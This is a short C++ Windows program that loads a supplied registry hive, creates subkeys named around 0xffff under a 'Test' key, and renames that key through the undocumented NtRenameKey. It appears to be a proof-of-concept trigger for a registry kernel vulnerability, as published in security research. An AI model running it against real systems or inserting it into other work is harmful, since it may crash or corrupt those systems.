#include <Windows.h>
#include <winternl.h>

#include <cstdio>

#pragma comment(lib, "ntdll")

extern "C" {

NTSTATUS NTAPI NtRenameKey(
  HANDLE          KeyHandle,
  PUNICODE_STRING NewName
);

}  // extern "C"

int main(int argc, char** argv) {
  if (argc != 2) {
    printf("Usage: %s <hive file>\n", argv[0]);
    return 1;
  }

  LONG st;
  NTSTATUS ntstatus;
  HKEY hkey, hnestedkey;

  do {
    st = RegLoadAppKeyA(argv[1], &hkey, KEY_ALL_ACCESS, 0, 0);
    if (st != ERROR_SUCCESS) {
      break;
    }

    printf("Hive successfully loaded\n");

    st = RegOpenKeyExW(hkey, L"Test", 0, KEY_ALL_ACCESS, &hnestedkey);
    if (st != ERROR_SUCCESS) {
      break;
    }

    printf("Nested key successfully opened\n");

    for (ULONG i = 0xffff; i < 0xffff + 4; i++) {
      CHAR chKeyName[10];
      _snprintf_s(chKeyName, sizeof(chKeyName), "%.8x", i);

      HKEY hnewkey;
      st = RegCreateKeyExA(hnestedkey, chKeyName, 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hnewkey, NULL);
      if (st != ERROR_SUCCESS) {
        goto error;
      }

      printf("Key successfully created\n");

      RegCloseKey(hnewkey);
    }

    UNICODE_STRING NewName;
    RtlInitUnicodeString(&NewName, L"AAAAAAAA");

    ntstatus = NtRenameKey(hnestedkey, &NewName);
    if (!NT_SUCCESS(ntstatus)) {
      printf("NtRenameKey failed with error %x\n", ntstatus);
      break;
    }

    printf("Key successfully renamed\n");

    RegCloseKey(hnestedkey);
    RegCloseKey(hkey);
  } while (0);

error:
  if (st != ERROR_SUCCESS) {
    printf("Call failed with error %d\n", st);
  }

  return 0;
}
